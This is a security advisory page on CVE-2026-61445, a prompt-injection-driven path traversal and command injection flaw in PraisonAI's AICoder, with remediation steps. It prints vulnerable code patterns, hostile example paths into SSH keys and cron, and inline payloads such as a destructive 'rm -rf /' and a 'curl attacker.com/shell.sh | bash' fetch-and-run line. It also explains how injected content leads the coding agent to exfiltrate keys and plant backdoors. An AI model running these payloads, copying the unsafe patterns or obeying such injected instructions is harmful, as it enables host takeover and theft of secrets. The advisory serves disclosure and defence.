Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsTraining
StudyProjectsNewsletterHire MeAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Training
Study
Projects
Newsletter
Hire Me
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1852+ Articles
149+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Checklists
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-61445: PraisonAI AICoder Arbitrary File Write and Command Injection via LLM Tool Calls
CVE-2026-61445: PraisonAI AICoder Arbitrary File Write and Command Injection via LLM Tool Calls

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2026-61445

CVE-2026-61445: PraisonAI AICoder Arbitrary File Write and Command Injection via LLM Tool Calls

A CVSS 9.9 critical vulnerability in PraisonAI before 4.6.78 allows attackers to write files to arbitrary filesystem locations and execute arbitrary OS commands by injecting malicious prompts through the AICoder chat interface.

Dylan H.

Security Team

July 12, 2026
3 min read

Affected Products

  • PraisonAI < 4.6.78

Overview

CVE-2026-61445 is a near-maximum-severity (CVSS 9.9) vulnerability in the AICoder component of PraisonAI. Two closely related weaknesses combine to allow a threat actor to fully compromise the host system:

  1. Arbitrary file write via missing path validation in LLM tool calls — enabling path traversal attacks that write files anywhere the process has write access.
  2. Command injection via unsanitized command strings passed to shell execution functions within LLM tool calls.

An attacker can exploit either flaw by injecting malicious instructions through the AICoder chat interface. Because AICoder is designed to take autonomous coding actions on behalf of the user, the LLM will faithfully execute attacker-supplied instructions when they are embedded in processed content.

Technical Details

Flaw 1: Arbitrary File Write (Path Traversal)

AICoder exposes file-writing tool calls to the LLM (e.g., write_file, save_code). The target path is taken directly from the LLM's output without canonicalization or jail-checking:

# Simplified vulnerable pattern
def write_file(path: str, content: str):
    with open(path, "w") as f:   # No realpath / chroot check
        f.write(content)

A prompt-injected payload can provide a path like ../../.ssh/authorized_keys or /etc/cron.d/backdoor, causing the agent to write attacker-controlled content to sensitive locations.

Flaw 2: Command Injection

AICoder also exposes shell execution tool calls (e.g., run_command, execute_shell) where the command string is constructed from LLM output without sanitization:

# Simplified vulnerable pattern
def run_command(cmd: str):
    subprocess.run(cmd, shell=True)  # shell=True + unsanitized input

Using shell=True with unsanitized LLM output allows injection of shell metacharacters: ; rm -rf /, `curl attacker.com/shell.sh | bash`, and similar payloads.

Combined Exploitation Scenario

An attacker embedding a payload in a document, web page, or API response processed by AICoder could:

  1. Write a malicious cron job to /etc/cron.d/ for persistent execution.
  2. Exfiltrate SSH keys, environment variables, or config files.
  3. Drop a reverse shell script and execute it via the command injection path.
  4. Overwrite application code to establish a persistent backdoor.

Affected Versions

ProductComponentAffectedFixed
PraisonAIAICoder< 4.6.784.6.78+

Remediation

Upgrade to PraisonAI 4.6.78 or later immediately. The fix introduces path canonicalization with a jail-root check for all file operations and removes shell=True from command execution in favour of argument list invocation with an explicit allow-list.

Interim mitigations if patching is not immediately feasible:

  1. Disable AICoder or any tool that grants the LLM file-write or shell-execution capabilities until the patch is applied.
  2. Run in a read-only container with a minimal filesystem and no network egress to limit the impact of exploitation.
  3. Apply strict AppArmor / seccomp profiles to constrain what the PraisonAI process can write and execute.
  4. Audit chat history and tool call logs for suspicious file paths or shell commands.
  5. Sanitize and validate all external content before feeding it to the AICoder context.

References

  • NVD — CVE-2026-61445
  • PraisonAI GitHub

Timeline

DateEvent
2026-07-11NVD publication
2026-07-12CosmicBytez Labs advisory published
#CVE#Command Injection#Path Traversal#AI Security#Prompt Injection#PraisonAI#Critical

Related Articles

CVE-2026-61447: PraisonAI CodeAgent Remote Code Execution via Unsandboxed Python Execution

A CVSS 10.0 critical vulnerability in PraisonAI before 1.6.78 allows attackers to achieve remote code execution by injecting malicious prompts that exploit the CodeAgent's unsandboxed LLM-generated Python execution pipeline.

3 min read

CVE-2026-60090: PraisonAI SQL Injection via Unvalidated Dimension Parameter in Vector Store Backends

A CVSS 9.8 critical SQL injection vulnerability in PraisonAI before 4.6.78 allows attackers to exploit the unvalidated dimension argument in PGVector and Cassandra knowledge-store backends to execute arbitrary database queries.

3 min read

CVE-2026-54352: Budibase Zip Upload Path Traversal Enables Remote Code Execution (CVSS 9.6)

A critical path traversal vulnerability in Budibase's zip upload endpoint allows attackers to write arbitrary files outside the intended temp directory,...

3 min read
Back to all Security Alerts